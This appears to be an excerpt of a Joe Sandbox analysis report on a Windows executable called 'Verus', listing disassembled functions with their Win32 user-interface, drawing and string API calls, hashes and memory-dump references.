Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: lstrcmp
String ID:
API String ID: 1534048567-0
Opcode ID: 2481cd5aaa26a7a14dc21bc4a37f6dae2c8895ef9238b79b2215db5688986b0a
Instruction ID: 8cf21e5f326a2d36e403e9d38676a3183e263e2f5eabd81117ca431a800d24cb
Opcode Fuzzy Hash: 2481cd5aaa26a7a14dc21bc4a37f6dae2c8895ef9238b79b2215db5688986b0a
Instruction Fuzzy Hash: CD413E7E6002205BE700AB2AD8659FBB3DAFFD1310F44446BE49583291FA3A949587A7

Function 004666A0 Relevance: 9.1, APIs: 6, Instructions: 123windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00466570: GlobalUnlock.KERNEL32(?), ref: 0046657E

SendMessageW.USER32(?,0000800A,?,00000001), ref: 0046671E
GlobalUnlock.KERNEL32(?), ref: 00466797

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: GlobalUnlock$MessageSend
String ID:
API String ID: 758799503-0
Opcode ID: 38f541a65001e2e68b915ca60077e62ebbc580c115713a491d5bea733efb5e45
Instruction ID: 471bebd1203157b15433ccbda99cd78026f95090485be8f2796572563315a467
Opcode Fuzzy Hash: 38f541a65001e2e68b915ca60077e62ebbc580c115713a491d5bea733efb5e45
Instruction Fuzzy Hash: 9E417171200300AFD714DF54D894E6B73F9BBC8709F01491DBA468B291EB78E80DCB66

Function 0046CA60 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0046CA7E
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0046CA8C
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 0046CAAA
SendMessageW.USER32 ref: 0046CAC5

Part of subcall function 0046C020: SendMessageW.USER32 ref: 0046C08A

SendMessageW.USER32(?,0000104B,00000000,000000FF), ref: 0046CB1D
SendMessageW.USER32(?,0000100C,00000000,00000002), ref: 0046CB80

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 1ee667486f908459ed40047bfc57b7f5c57ca00c80c5edf047c3c446c76abfe9
Instruction ID: 41718a8bb139d0c49379a8c3c79541141dedc7897e365c772f372808dc6f39a9
Opcode Fuzzy Hash: 1ee667486f908459ed40047bfc57b7f5c57ca00c80c5edf047c3c446c76abfe9
Instruction Fuzzy Hash: B03190B1644301AFD350DF698C81F6BB7E8BB88714F004A1EF699D72D0E374E8008B9A

Function 0044CB60 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON

Download Yara Rule

APIs

MapWindowPoints.USER32(?,00000000,00000001,00000001), ref: 0044CB90
MapWindowPoints.USER32(?,00000000,00000000,00000002), ref: 0044CBBE

Part of subcall function 00415BD0: _memset.LIBCMT ref: 00415BF0
Part of subcall function 00415BD0: GetVersionExW.KERNEL32 ref: 00415C04

SendMessageW.USER32(?,0000052D), ref: 0044CC22
IsWindow.USER32(00000000), ref: 0044CC2B
SendMessageW.USER32 ref: 0044CC6C
TrackPopupMenuEx.USER32(?,?,00000001,00000001,?,00000000), ref: 0044CC93

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Window$MessagePointsSend$MenuPopupTrackVersion_memset
String ID:
API String ID: 941122160-0
Opcode ID: c743ad64b8ce8cc8bcf5a179f7b42ab0bb58a0c410fc0a865f73e80498bbed78
Instruction ID: 540441b57c6014235046fe26dfab05d5bed80a54049cce39221aee442cd0d8d9
Opcode Fuzzy Hash: c743ad64b8ce8cc8bcf5a179f7b42ab0bb58a0c410fc0a865f73e80498bbed78
Instruction Fuzzy Hash: 4A41F2B5609300AFD344CF59D980A5BBBF4EBC8750F10892EFA8997360D375E804CBA6

Function 0044B190 Relevance: 9.1, APIs: 6, Instructions: 63windowCOMMON

Download Yara Rule

APIs

GetWindowDC.USER32(?), ref: 0044B1D5

Part of subcall function 0044AA90: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,?), ref: 0044AAF6
Part of subcall function 0044AA90: CreatePatternBrush.GDI32(00000000), ref: 0044AB03
Part of subcall function 0044AA90: DeleteObject.GDI32(00000000), ref: 0044AB0C

SelectObject.GDI32(00000000), ref: 0044B1EF
PatBlt.GDI32(00000000,?,?,?,?,005A0049), ref: 0044B20F
SelectObject.GDI32(00000000,?), ref: 0044B21B
DeleteObject.GDI32 ref: 0044B222
ReleaseDC.USER32(?,00000000), ref: 0044B22E

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Object$CreateDeleteSelect$BitmapBrushPatternReleaseWindow
String ID:
API String ID: 2686547972-0
Opcode ID: 5aa8365aad5fea54cd2ab0e80bd0579ff3af71c1fbf2b8d91a8ec4f956168d66
Instruction ID: c40293221d68065e18b6f82d4644a30f5cf93477b924e71fa46719bf07ab7c3a
Opcode Fuzzy Hash: 5aa8365aad5fea54cd2ab0e80bd0579ff3af71c1fbf2b8d91a8ec4f956168d66
Instruction Fuzzy Hash: F3118C765003009FD700DF68DD48C2B7BA8FE88354B24066EFA499B202D736EC06CBA6

Function 00468130 Relevance: 9.1, APIs: 6, Instructions: 61windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(?), ref: 00468174
DeleteObject.GDI32(?), ref: 0046817D
DeleteObject.GDI32(?), ref: 00468186
DestroyMenu.USER32(?,?,?,?,00000000,004C1908,000000FF,0044C0E4), ref: 00468193
IsWindow.USER32(?), ref: 004681A0
DestroyWindow.USER32(?,?,?,?,00000000,004C1908,000000FF,0044C0E4), ref: 004681B1

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: DeleteObject$DestroyWindow$Menu
String ID:
API String ID: 3996781781-0
Opcode ID: d0fe52fc966103c331979f8d5259c2b38900d6e08a5cbd1306317dbfdea9118f
Instruction ID: 7a14697e52bd58f34840d41d33c49d3a78fe50653263258918b337f1e8adf11d
Opcode Fuzzy Hash: d0fe52fc966103c331979f8d5259c2b38900d6e08a5cbd1306317dbfdea9118f
Instruction Fuzzy Hash: D9214DB12047009FD720DF29D844BA7B7E8FF89710F044A1EE4AA83350DB38A805CB66

Function 00456C60 Relevance: 9.1, APIs: 6, Instructions: 59stringCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(?,00000000,00000000), ref: 00456C91
lstrlenW.KERNEL32(?), ref: 00456CA2
lstrlenW.KERNEL32(?), ref: 00456CB3
_wcsncat.LIBCMT ref: 00456CC7
lstrcatW.KERNEL32(?,?), ref: 00456CDE
_vswprintf_s.LIBCMT ref: 00456CFA

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: lstrlen$_vswprintf_s_wcsncatlstrcatlstrcpy
String ID:
API String ID: 3939141285-0
Opcode ID: 17d1e962e4cb51a4f5647b8ae82ba9000a45398aac3ad445d05bf34fa1816255
Instruction ID: 7cb0fafc94a97ee78edc536a210ed1edaff505111879087ae7f8794a27ec6f8f
Opcode Fuzzy Hash: 17d1e962e4cb51a4f5647b8ae82ba9000a45398aac3ad445d05bf34fa1816255
Instruction Fuzzy Hash: B511E7B2504305ABD720EB64DC85EEFB3A8FFD8310F008A2EF55943241DA34A908C7E6

Function 00448110 Relevance: 9.1, APIs: 6, Instructions: 58windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00448136
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00448147
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0044815C
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00448183
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00448194
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 004481A9

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 610bd2e0da36303ccbb481521c79055fa83df1e71e65762ff214e7efa656ee5a
Instruction ID: 366cad1b81217ff20598becffd95894db788c589e8dad4fbb25b847661904031
Opcode Fuzzy Hash: 610bd2e0da36303ccbb481521c79055fa83df1e71e65762ff214e7efa656ee5a
Instruction Fuzzy Hash: 8E1125757407007AF225D674DC81FE773A8ABD4B21F02491AF746E71C0D9F4A8428774

Function 004465B0 Relevance: 9.1, APIs: 6, Instructions: 53windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 004465BB
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 004465D1
GetSubMenu.USER32(?,00000000), ref: 004465F6
TrackPopupMenuEx.USER32(00000000), ref: 004465FD
GetSubMenu.USER32(?,00000000), ref: 0044662F
TrackPopupMenuEx.USER32(00000000), ref: 00446636

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Menu$PopupTrack$CursorMessageSend
String ID:
API String ID: 2620405004-0
Opcode ID: 295956bb072f2151decb98a5cf9b3569904c28866b389c4d30541d17b540ea6f
Instruction ID: fc1963a7a3aff876d7a48c12e9dae19a1ddd07007672b977f218f1bcc9410b0b
Opcode Fuzzy Hash: 295956bb072f2151decb98a5cf9b3569904c28866b389c4d30541d17b540ea6f
Instruction Fuzzy Hash: 34111BB9244300AFE364DBA4DD59F97B7A8EBC8701F10891ABA5587390DA70F844CB79

Function 00456FB0 Relevance: 9.1, APIs: 6, Instructions: 53stringCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(?,00000000,00000000), ref: 00456FE4
lstrlenW.KERNEL32(?), ref: 00456FF5
lstrlenW.KERNEL32(?), ref: 00456FFF
_wcsncat.LIBCMT ref: 0045700C
lstrcatW.KERNEL32(?,?), ref: 0045701C
SetDlgItemTextW.USER32(?,000003EF,?), ref: 00457030

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: lstrlen$ItemText_wcsncatlstrcatlstrcpy
String ID:
API String ID: 3075847173-0
Opcode ID: e16f5f8c386deb714c85c03e9ee23426b5f0fe1a4650b41509dac99b00a4999a
Instruction ID: 6dcd0cc59f183a49bb0e6e055061b31b121b2559baaec3b9a6123262103cf169
Opcode Fuzzy Hash: e16f5f8c386deb714c85c03e9ee23426b5f0fe1a4650b41509dac99b00a4999a
Instruction Fuzzy Hash: 4D01D6B29043056BD320DF60EC86DAFB7ACEBC9711F00493EFA4592241DA34E908C7A6

Function 0041E910 Relevance: 9.1, APIs: 6, Instructions: 52windowCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,00000452,AD5E0258), ref: 0041E939
CheckDlgButton.USER32(?,000004AD), ref: 0041E94C
GetDlgItem.USER32(?,00000495), ref: 0041E957
SendMessageW.USER32(00000000,000000C5,00000003,00000000), ref: 0041E967
__itow.LIBCMT ref: 0041E97A

Part of subcall function 00492466: _xtow@16.LIBCMT ref: 00492486

SetDlgItemTextW.USER32(?,00000495,?), ref: 0041E990

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: ButtonCheckItem$MessageSendText__itow_xtow@16
String ID:
API String ID: 378277338-0
Opcode ID: 16dd8c54aa5ea20afb7054fe6c2093ccad4113d5b12c7b00af02b1c83b502a3c
Instruction ID: 8cc8077ca10cfba3a3226a40e4ed16af74d3976e9a4f4d9d51688974df7ab4f9
Opcode Fuzzy Hash: 16dd8c54aa5ea20afb7054fe6c2093ccad4113d5b12c7b00af02b1c83b502a3c
Instruction Fuzzy Hash: C40196B57003007FD614DB69ED56F2777A8ABC8B10F04882DF759872D1D6B4A904CB6A

Function 0043A2B0 Relevance: 9.0, APIs: 6, Instructions: 48COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 0043A2D2
GetDC.USER32(00000000), ref: 0043A2DB
_memset.LIBCMT ref: 0043A2F4
GetTextMetricsW.GDI32(00000000,?), ref: 0043A302
ReleaseDC.USER32(00000000,00000000), ref: 0043A311
GetSystemMetrics.USER32(0000000F), ref: 0043A322

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Metrics$ItemReleaseSystemText_memset
String ID:
API String ID: 2343589144-0
Opcode ID: 82c6ca6e1e6dcc2753cf64626d63aff5dcc90a7d757950881b31d2d68ea9328a
Instruction ID: f18b3b2c8ecc299616b99197122286e83b9c705b9d17b94a0b4a212e6290ae03
Opcode Fuzzy Hash: 82c6ca6e1e6dcc2753cf64626d63aff5dcc90a7d757950881b31d2d68ea9328a
Instruction Fuzzy Hash: B3019E76504200AFC344DF54ED88F6B7BA8EB89711F04852AFE09C2251D7358519C7AA

Function 004609C0 Relevance: 9.0, APIs: 6, Instructions: 47windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004609D8
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004609E6
GetParent.USER32(?), ref: 004609EE
SendMessageW.USER32(00000000,00008014,?,00000000), ref: 004609FF
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00460A0E
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00460A1C

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: MessageSend$Parent
String ID:
API String ID: 1020955656-0
Opcode ID: 031c50507c0ac55aed9ff2648eeea55b3191d2116a3f9a6b627c79848a06e341
Instruction ID: c0410704e1d84d4bcf4116b2f361f0d491b6cd48432ccd899157896e0ebaa739
Opcode Fuzzy Hash: 031c50507c0ac55aed9ff2648eeea55b3191d2116a3f9a6b627c79848a06e341
Instruction Fuzzy Hash: 6B01BBB5340704BBE260DBA98D45F67B3EDABC8B14F11481AB345AB6D0C6F4B8058A64

Function 00456F41 Relevance: 9.0, APIs: 6, Instructions: 38windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E8), ref: 00456F53
GetWindowLongW.USER32(00000000,000000F0), ref: 00456F5E
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00456F72
SendMessageW.USER32(00000000,0000040A,00000001,00000032), ref: 00456F82
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00456F93
SendMessageW.USER32(00000000,0000040A,00000000,00000032), ref: 00456FA3

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: LongWindow$MessageSend$Item
String ID:
API String ID: 1628110938-0
Opcode ID: 7a37ea69611ec87617f5a9ef5583ae7b0a57e0f2942cdc9776d2679d7f909a2b
Instruction ID: 35912f9b717dd40275da198418170bdbb449d00d5310a45b7a5d5753219936c0
Opcode Fuzzy Hash: 7a37ea69611ec87617f5a9ef5583ae7b0a57e0f2942cdc9776d2679d7f909a2b
Instruction Fuzzy Hash: B9F0B4725856207BE6815314BD0DFEA3A18ABA2773F114310F721E51E4CB680942C66D

Function 00434C90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00434CE8
_swscanf.LIBCMT ref: 00434D08

Part of subcall function 00492634: _vscan_fn.LIBCMT ref: 0049264B

Part of subcall function 00477350: AreFileApisANSI.KERNEL32(00000001,?,?,?,?,?,?,004267F4,?,?,00000107), ref: 00477378
